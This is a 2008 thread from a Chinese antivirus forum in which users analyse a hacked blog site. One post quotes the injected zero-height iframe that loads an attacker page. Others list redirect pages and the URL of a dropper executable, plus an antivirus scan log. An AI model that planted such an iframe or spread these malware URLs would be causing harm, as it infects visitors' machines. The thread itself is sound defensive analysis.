查看: 6455|回复: 22
收起左侧

[病毒样本] ITECN.net被挂马,大家小心

[复制链接]
dqc
发表于 2008-3-1 12:18:23 | 显示全部楼层 |阅读模式
http://blogs.itecn.net/blogs/default.aspx卡巴弹出报警窗口,源文件中有一行:
<iframe src=http://xxx.wofala.info/123.htm width=100 height=0></iframe>      
怀疑是ARP

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tanlimo
发表于 2008-3-1 12:35:27 | 显示全部楼层
http://xxx.huilaiba.info/ww/la.exe

ESS扫描日志
病毒库版本: 2913 (20080301)
日期: 2008-3-1  时间: 12:40:49
已扫描的磁盘、文件夹和文件: D:\Documents and Settings\xxxxxxxx\桌面\la.exe
已扫描的对象数: 1
发现的威胁数: 0
完成时间: 12:40:50  总扫描时间: 1 秒 (00:00:01)

[ 本帖最后由 tanlimo 于 2008-3-1 12:37 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aribeth199
发表于 2008-3-1 12:41:14 | 显示全部楼层
博客没发现问题,图片中的网址有问题。
zzh161
发表于 2008-3-1 12:43:52 | 显示全部楼层
怎么可能是死链呢

样本:

下载地址:




顺便把以前搜集的结果给出来
hxxp://xxx.wofala.info/1001.htm?F100=11
              hxxp://xxx.wofala.info/ceshi/real.htm  --->hxxp://xxx.huilaiba.info/ww/la.exe
              hxxp://xxx.wofala.info/ceshi/lz.htm    --->hxxp://xxx.huilaiba.info/ww/la.exe
              hxxp://xxx.wofala.info/ceshi/614.htm   --->hxxp://xxx.huilaiba.info/ww/la.exe

[ 本帖最后由 zzh161 于 2008-3-1 12:46 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
冷冷
发表于 2008-3-1 13:01:15 | 显示全部楼层
SBie

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jimmyleo
发表于 2008-3-1 13:02:54 | 显示全部楼层
冷 那个css应该不是吧。
冷冷
发表于 2008-3-1 13:03:49 | 显示全部楼层

回复 6楼 jimmyleo 的帖子

。。。。。
不清楚
可疑的画圈了
jimmyleo
发表于 2008-3-1 13:06:49 | 显示全部楼层
css本来是层叠样式表来着
可是被以前那个bak。css带坏头了……呵呵
冷冷
发表于 2008-3-1 13:07:55 | 显示全部楼层

回复 8楼 jimmyleo 的帖子


恩 被他影响了
zzh161
发表于 2008-3-1 13:11:43 | 显示全部楼层
发现有个下载者喜欢去下张gif,打开以后看到会指向一个css。。。绝对怀疑那个css是用来计数的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 06:52 , Processed in 0.124990 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表